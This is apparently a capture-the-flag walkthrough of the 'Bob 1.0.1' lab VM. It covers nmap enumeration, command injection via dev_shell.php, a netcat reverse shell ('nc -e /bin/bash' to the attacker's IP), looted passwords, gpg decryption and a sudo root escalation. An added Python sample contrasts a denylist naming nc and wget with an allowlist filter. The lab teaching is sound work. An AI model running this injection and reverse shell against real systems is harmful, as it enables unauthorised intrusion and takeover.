# Bob 1.0.1

## Enumeration

### nmap

```
nmap -sC -sV -oA nmap/Bob 192.168.1.112
```

```
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-19 22:59 EDT
Stats: 0:00:01 elapsed; 0 hosts completed (0 up), 0 undergoing Script Pre-Scan
NSE Timing: About 0.00% done
Nmap scan report for 192.168.1.112
Host is up (0.00014s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
| http-robots.txt: 4 disallowed entries 
| /login.php /dev_shell.php /lat_memo.html 
|_/passwords.html
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 00:0C:29:3B:96:26 (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.57 seconds

```

We see that only port 80 is open and that `robots.txt` has some disallowed entries.

Let's open it in the browser and see what we get.

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7lCINr34L9XsTyb0Qr%2F-M7lDjALQ-BJ4M08YLun%2Fimage.png?alt=media\&token=177195a6-a67b-44d0-b793-60471f3c69cc)

Got this.

## Exploitation

Then I navigated to `/dev_shell.php`.

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7lCINr34L9XsTyb0Qr%2F-M7lDsIL7e8wcRhzmdUp%2Fimage.png?alt=media\&token=db03be76-3e76-40c6-abb4-c0b6d9f01a3a)

Got this shell. I tried `ping 192.168.1.113` and `; ping 102.168.1.113` and got this error:

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7lCINr34L9XsTyb0Qr%2F-M7lEn9ceB8veW6oVr2o%2Fimage.png?alt=media\&token=b44513a8-c9ba-4416-8b08-71f710515b35)

After a few tries, I found out that `id` can be used, so I went on to set up a listener.

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7lCINr34L9XsTyb0Qr%2F-M7lFJzPmCjSPYOVe4cK%2Fimage.png?alt=media\&token=592ff6d5-08cd-457d-95af-ba51193849e2)

### Reverse Shell

On our machine, type:

```
nc -nlvp 4444
```

In the `dev_shell`, type:

```
id | nc -e /bin/bash 192.168.1.113 4444
```

We will then receive a shell. From there, type:

```
python -c 'import pty; pty.spawn("/bin/bash")'
```

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7lCINr34L9XsTyb0Qr%2F-M7lH3qoW4IWkokpTv7g%2Fimage.png?alt=media\&token=690127b6-464b-481a-841b-12736974a279)
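Why the piped input got through, as an added example (not from the original write-up and not the VM's `dev_shell.php` source): a denylist that only looks for `;` and at the first word, a hypothetical model consistent with the behaviour observed above, next to an allowlist that never invokes a shell. The denied words, the `ALLOWED` table and the binary paths are assumptions.

```python
import re
import shlex

# Hypothetical denylist, modelled on the behaviour the write-up observed
# (ping and ';' rejected, id accepted); not the VM's actual filter code.
DENIED_FIRST_WORDS = {"ping", "nc", "netcat", "cat", "ls", "wget", "ssh"}

def denylist_filter(user_input: str) -> bool:
    """Weak check: reject ';' and a denied first word; anything accepted
    would then be handed to a shell as one string. True means accepted."""
    if ";" in user_input:
        return False
    words = user_input.split()
    return bool(words) and words[0] not in DENIED_FIRST_WORDS

# Hardened form: fixed allowlist mapped to argv lists, no shell involved.
# Paths are assumed locations for a Debian host.
ALLOWED = {"id": ["/usr/bin/id"], "uptime": ["/usr/bin/uptime"]}
SHELL_META = re.compile(r"[;&|`$<>(){}\\\n]")

def allowlist_argv(user_input: str):
    """Return the argv to execute without a shell, or None to refuse."""
    if SHELL_META.search(user_input):
        return None
    try:
        words = shlex.split(user_input)
    except ValueError:  # unbalanced quotes
        return None
    if len(words) != 1 or words[0] not in ALLOWED:
        return None  # no user-supplied arguments at all
    return list(ALLOWED[words[0]])

def compare(inputs):
    """(input, accepted by denylist, accepted by allowlist) per sample."""
    return [(s, denylist_filter(s), allowlist_argv(s) is not None)
            for s in inputs]

# Inputs taken from the write-up.
SAMPLES = [
    "ping 192.168.1.113",
    "; ping 102.168.1.113",
    "id",
    "id | nc -e /bin/bash 192.168.1.113 4444",
]

if __name__ == "__main__":
    for s, weak, strong in compare(SAMPLES):
        print(f"{s!r:45} denylist={'pass' if weak else 'block'} "
              f"allowlist={'pass' if strong else 'block'}")
```

The last sample is the only row where the two checks disagree: the denylist sees an allowed first word and no `;`, while the allowlist refuses any shell metacharacter and any argument.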

Then navigate to the `/home` directory, where we see 4 directories: `bob`, `elliot`, `jc` and `seb`.

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7lCINr34L9XsTyb0Qr%2F-M7lHBTXH8kXpy4_aXUy%2Fimage.png?alt=media\&token=1ae36b04-90ee-4a9f-b139-acfe30376549)

I first went to the `elliot` directory and saw a file called `theadminisdumb.txt`.

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7lCINr34L9XsTyb0Qr%2F-M7lJLqnaDhYpLOcOEVH%2Fimage.png?alt=media\&token=8d7cd35b-b75d-49ef-a43c-2186d0bca9d5)

After running `cat` on the file:

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7lCINr34L9XsTyb0Qr%2F-M7lK4fDkIhv9Eiy0IOd%2Fimage.png?alt=media\&token=63d2afc1-a936-4a44-9a1f-a69287a14a82)

We can see that there is a password `Qwerty` for a user. After trying `su` to the other 3 users, we know that this password is for `jc`. The password `theadminisdumb` is for `elliot`.

`su` into `elliot`:

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7lCINr34L9XsTyb0Qr%2F-M7lNIWyrgn-hT96GQrW%2Fimage.png?alt=media\&token=7d5a4d18-6630-4f37-bfd7-daaad4756a38)

I couldn't find anything on those users, so I went to the `bob` user to look for anything interesting. After looking around, I navigated to `/Documents` and saw 2 text files and a directory.

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7lCINr34L9XsTyb0Qr%2F-M7lNbLSmssZTUdsVuaV%2Fimage.png?alt=media\&token=0a82bfd6-ea11-4bde-92cc-7155a598335c)

Inside `/Secret/Keep_out/Not_Porn/No_Lookie_In_Here` there is a `notes.sh`.

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7lCINr34L9XsTyb0Qr%2F-M7lNpubCnoZnolm2XDE%2Fimage.png?alt=media\&token=31139d63-a027-4341-ae92-749f9cfbbcd5)

`cat` the file. The first characters of each sentence spell HARPOCRATES, which must indicate a password.

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7lCINr34L9XsTyb0Qr%2F-M7lNuFL0ChLUwbt9UKh%2Fimage.png?alt=media\&token=3a2a4efd-998b-46d7-9fa6-dcdddfaa9937)

I went back to the `Documents` directory.

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7lCINr34L9XsTyb0Qr%2F-M7lNxwEXjGzrbbCNSig%2Fimage.png?alt=media\&token=e6445fbd-d636-4dc6-942c-d788b21aab97)

We can see there is a `login.txt.gpg`. Using the string we just got, we might be able to decrypt the file.

```
gpg --batch --passphrase HARPOCRATES -d login.txt.gpg
```

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7lCINr34L9XsTyb0Qr%2F-M7lO10ixLrtEX6lQ4s3%2Fimage.png?alt=media\&token=ff829d40-b3ab-4db3-bd41-b440036583dc)

We can see that a set of credentials has been decrypted, and they are `bob`'s credentials.

## Privilege Escalation

Let's `su` into `bob`.

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7lCINr34L9XsTyb0Qr%2F-M7lOEpYkp0SQqmiNKBd%2Fimage.png?alt=media\&token=e79bb9d5-a5a0-4cbf-806d-9dab6a4d8b96)

Type `sudo -l`.

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7lCINr34L9XsTyb0Qr%2F-M7lOMYYYJzNHA5yNoyj%2Fimage.png?alt=media\&token=1c1cbffa-b137-431a-bd95-d3e68f91da99)

We can see that this user has sudo rights.

Type `sudo bash` and we will get root.

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7lCINr34L9XsTyb0Qr%2F-M7lOiXM32hz1VlzLpiT%2Fimage.png?alt=media\&token=93c2281b-e54f-45ae-9d7e-6e3e8b0ffee8)

Type `/flag.txt` and we will get the flag.

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7lCINr34L9XsTyb0Qr%2F-M7lPAx15BwKHMH2yIYi%2Fimage.png?alt=media\&token=576cdb51-b22a-4b4a-b9b9-161c2488f157)

Congratulations!
